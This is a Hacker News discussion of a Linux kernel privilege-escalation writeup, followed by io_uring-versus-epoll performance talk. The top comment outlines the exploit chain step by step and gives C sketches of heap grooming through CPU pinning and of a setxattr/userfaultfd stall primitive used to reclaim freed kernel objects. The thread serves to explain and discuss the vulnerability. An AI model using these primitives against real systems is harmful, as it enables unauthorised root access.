[HN Gopher] Put an io_uring on it: Exploiting the Linux kernel
       ___________________________________________________________________
        
       Put an io_uring on it: Exploiting the Linux kernel
        
       Author : blopeur
       Score  : 80 points
       Date   : 2022-03-08 19:35 UTC (3 hours ago)
        
 (HTM) web link (www.graplsecurity.com)
 (TXT) w3m dump (www.graplsecurity.com)
        
       | tptacek wrote:
       | This is one of the all-time great LPE writeups.
       | 
       | A summary:
       | 
        | 1. io_uring includes a feature that asks the kernel to manage
        | groups of buffers for SQEs (the objects userland submits to
        | tell uring what to do). If you enable this feature, the
        | kernel overloads a field normally used to track a userland
        | pointer with a kernel pointer. (Rough sketch after the list.)
       | 
       | 2. The special-case code that handles I/O operations for files-
       | that-are-not-files, like in procfs, missed the check for this
       | "overloaded pointer" hack, and so can be tricked into advancing a
       | kernel pointer arbitrarily, because it thinks it's working with a
       | userland pointer.
       | 
       | 3. The pointer you manipulate thusly is eventually freed, which
       | lets you free kernel objects within a range of possible pointers.
       | 
        | 4. io_uring allows you to control the CPU affinity of the
        | kernel threads it generates on your behalf, because of course
        | it does, so you can get your userland process and all your
        | related io_uring kthreads onto the same CPU, and thus into
        | the same SLUB cache area, which gives you enough control to
        | target specific kernel objects (of a size bounded I think by
        | the SQE?) reliably. (Affinity sketch after the list.)
       | 
        | 5. There's a well-known LPE trick for exploiting UAFs: the
        | setxattr(2) syscall copies arbitrary extended attributes for
        | files from userland to kernel buffers (that's its job), and
        | the userfaultfd(2) syscall lets you defer page faults to
        | userland; you can chain setxattr and userfaultfd to allocate
        | and populate a kernel buffer of arbitrary size and contents
        | and then block, keeping the object in memory. (Sketched in
        | code after the list.)
       | 
        | 6. Since that's a popular exploit technique, most distros now
        | ship a default (the vm.unprivileged_userfaultfd sysctl) that
        | restricts userfaultfd(2) to root. But you can do the same
        | thing with FUSE, where deferring I/O operations to userland
        | is kind of the whole premise of the interface.
       | 
       | 7. setxattr/userfaultfd can be transformed from a UAF primitive
       | to an arbitrary kernel leak: if you have an arbitrary-free
       | vulnerability (see step 3), you can do the setxattr-then-block
       | thing, then trigger the free from another thread and target the
       | xattr buffer, so setxattr's buffer is reclaimed out from under
       | it, then trigger the allocation of a kernel structure you want to
       | leak that is of the same size, which setxattr will copy into
       | (another UAF); now you have a kernel structure that the kernel is
       | treating like a file's extended attributes, which you can read
       | back with getxattr. Neat!
       | 
       | 8. At this point you can go hunting for kernel structures to
       | whack, because you can use the arbitrary leak primitive to leak
       | structs that in turn embed the (secret) addresses of other kernel
       | structures.
       | 
       | 9. Find a pointer to a socket's BPF filter and use the UAF to
       | inject a BPF filter directly, bypassing the verifier, then
       | trigger the BPF filter and do whatever you want, I guess.
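        | 
        | A rough liburing sketch of the buffer-group feature from
        | point 1, assuming the liburing 2.x API (error handling
        | omitted):
        | 
        |     #include <liburing.h>
        |     #include <stdlib.h>
        | 
        |     int main(void)
        |     {
        |         struct io_uring ring;
        |         struct io_uring_sqe *sqe;
        |         struct io_uring_cqe *cqe;
        |         char *bufs = malloc(8 * 4096);
        | 
        |         io_uring_queue_init(8, &ring, 0);
        | 
        |         /* Hand the kernel a group of 8 buffers (group
        |          * id 1); from now on the kernel, not userland,
        |          * picks which buffer a request fills. */
        |         sqe = io_uring_get_sqe(&ring);
        |         io_uring_prep_provide_buffers(sqe, bufs, 4096,
        |                                       8, 1, 0);
        |         io_uring_submit(&ring);
        |         io_uring_wait_cqe(&ring, &cqe);
        |         io_uring_cqe_seen(&ring, cqe);
        | 
        |         /* A read that selects from group 1: the buffer
        |          * pointer is left NULL for the kernel to fill
        |          * in -- this is the overloaded field. */
        |         sqe = io_uring_get_sqe(&ring);
        |         io_uring_prep_read(sqe, 0, NULL, 4096, 0);
        |         sqe->flags |= IOSQE_BUFFER_SELECT;
        |         sqe->buf_group = 1;
        |         io_uring_submit(&ring);
        |         return 0;
        |     }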
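        | 
        | For point 4, a minimal sketch of pinning everything to one
        | CPU (io_uring_register_iowq_aff needs liburing 2.1+ and
        | Linux 5.14+; whether the writeup uses this exact call is an
        | assumption on my part):
        | 
        |     #define _GNU_SOURCE
        |     #include <liburing.h>
        |     #include <sched.h>
        | 
        |     /* Pin the submitting task and the ring's io-wq
        |      * workers to CPU 0 so their allocations come out
        |      * of the same per-CPU SLUB caches. */
        |     int pin_to_cpu0(struct io_uring *ring)
        |     {
        |         cpu_set_t set;
        |         CPU_ZERO(&set);
        |         CPU_SET(0, &set);
        |         if (sched_setaffinity(0, sizeof(set), &set))
        |             return -1;
        |         return io_uring_register_iowq_aff(ring,
        |                                           sizeof(set),
        |                                           &set);
        |     }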
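        | 
        | And a sketch of the setxattr/userfaultfd stall from points
        | 5 and 7 (the path, sizes, and layout are illustrative, not
        | from the writeup; needs userfaultfd access per point 6):
        | 
        |     #define _GNU_SOURCE
        |     #include <fcntl.h>
        |     #include <linux/userfaultfd.h>
        |     #include <pthread.h>
        |     #include <string.h>
        |     #include <sys/ioctl.h>
        |     #include <sys/mman.h>
        |     #include <sys/syscall.h>
        |     #include <sys/xattr.h>
        |     #include <unistd.h>
        | 
        |     #define OBJ 64 /* size of kernel object to occupy */
        | 
        |     static void *stall(void *p)
        |     {
        |         /* The kernel kmallocs OBJ bytes, copies up to
        |          * the page boundary, then blocks in
        |          * copy_from_user until the fault is resolved;
        |          * the allocation stays live meanwhile. /tmp/x
        |          * must exist on an xattr-capable filesystem. */
        |         setxattr("/tmp/x", "user.a",
        |                  (char *)p + 4096 - OBJ + 8, OBJ, 0);
        |         return NULL;
        |     }
        | 
        |     int main(void)
        |     {
        |         struct uffdio_api api = { .api = UFFD_API };
        |         struct uffdio_register reg = { 0 };
        |         pthread_t t;
        | 
        |         /* Page 1 holds most of the xattr value; page 2
        |          * is never touched, so the kernel's copy
        |          * faults into it and blocks. */
        |         char *p = mmap(NULL, 2 * 4096,
        |                        PROT_READ | PROT_WRITE,
        |                        MAP_PRIVATE | MAP_ANONYMOUS,
        |                        -1, 0);
        |         memset(p, 0x41, 4096);
        | 
        |         int uffd = syscall(__NR_userfaultfd,
        |                            O_CLOEXEC | O_NONBLOCK);
        |         ioctl(uffd, UFFDIO_API, &api);
        |         reg.range.start = (unsigned long)(p + 4096);
        |         reg.range.len = 4096;
        |         reg.mode = UFFDIO_REGISTER_MODE_MISSING;
        |         ioctl(uffd, UFFDIO_REGISTER, &reg);
        | 
        |         pthread_create(&t, NULL, stall, p);
        |         /* ...here you'd trigger the arbitrary free,
        |          * spray the target object into the freed slot,
        |          * resolve the fault with UFFDIO_COPY, and read
        |          * the reclaimed object back with getxattr(2). */
        |         pause();
        |         return 0;
        |     }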
       | 
       | I'm sure I got a bunch of this wrong; corrections welcome. Again:
       | really spectacular writeup: a good bug, some neat tricks, and a
       | decent survey of Linux kernel LPE techniques.
        
       | junon wrote:
        | Yes, unfortunately I figured this might happen. People have
        | been warning about some major security issues with its design
        | for a while now. Paired with the fact that it's not much
        | faster in practice than epoll in a large majority of use
        | cases, I really worry it's going to footgun some people.
        
         | FridgeSeal wrote:
          | I'm confused by this; isn't one of the main points of uring
          | that it's faster?
        
         | frevib wrote:
         | For disk IO it's faster, there are many benchmarks on the
         | internet.
         | 
          | For network IO, it depends. Only two things make it
          | theoretically faster than epoll: io_uring supports batching
          | of requests, and you can save one syscall compared to epoll
          | in an event loop (rough sketch below). There are some other
          | things that could make it faster, like SQPOLL, but those
          | can also hurt performance.
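          | 
          | A minimal sketch of the batching point, assuming the
          | liburing 2.x API (error handling omitted):
          | 
          |     #include <liburing.h>
          | 
          |     void read_batch(struct io_uring *ring, int *fds,
          |                     char (*bufs)[4096], int n)
          |     {
          |         struct io_uring_cqe *cqe;
          | 
          |         for (int i = 0; i < n; i++) {
          |             struct io_uring_sqe *sqe =
          |                 io_uring_get_sqe(ring);
          |             io_uring_prep_read(sqe, fds[i], bufs[i],
          |                                4096, 0);
          |             io_uring_sqe_set_data(sqe,
          |                                   (void *)(long)i);
          |         }
          |         /* One syscall submits all n reads and waits
          |          * for completions; an epoll loop pays at
          |          * least one read(2) per fd on top of each
          |          * epoll_wait(2). */
          |         io_uring_submit_and_wait(ring, n);
          | 
          |         for (int i = 0; i < n; i++) {
          |             io_uring_peek_cqe(ring, &cqe);
          |             /* cqe->res is the byte count or -errno
          |              * for request cqe->user_data */
          |             io_uring_cqe_seen(ring, cqe);
          |         }
          |     }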
         | 
         | Network IO discussion:
         | https://github.com/axboe/liburing/issues/536
        
         | dralley wrote:
         | > Paired with the fact it's not much faster in practice than
         | epoll in a large majority of usecases, I really worry it's
         | going to footgun some people.
         | 
         | "it's not faster than epoll" is somewhat dependent on your
          | hardware and kernel. For one thing, Jens Axboe has been working
         | on a lot of io-uring optimizations lately, but you probably
         | won't see them unless you're using a kernel from the last few
         | months. And by "a lot" I really mean 3x to 4x faster in the
         | last year on the benchmarks he has been using.
         | 
         | So if all your comparisons are on an enterprisey linux distro,
         | you probably aren't getting a complete picture of epoll vs io-
         | uring performance. epoll has been around a while, it's had more
         | hours poured into optimization and probably regresses less
         | frequently.
        
       | egberts1 wrote:
       | Whoa!
       | 
       | One frickin' GIANT driver coherency setting, I/O Ring, that is.
        
       ___________________________________________________________________
       (page generated 2022-03-08 23:00 UTC)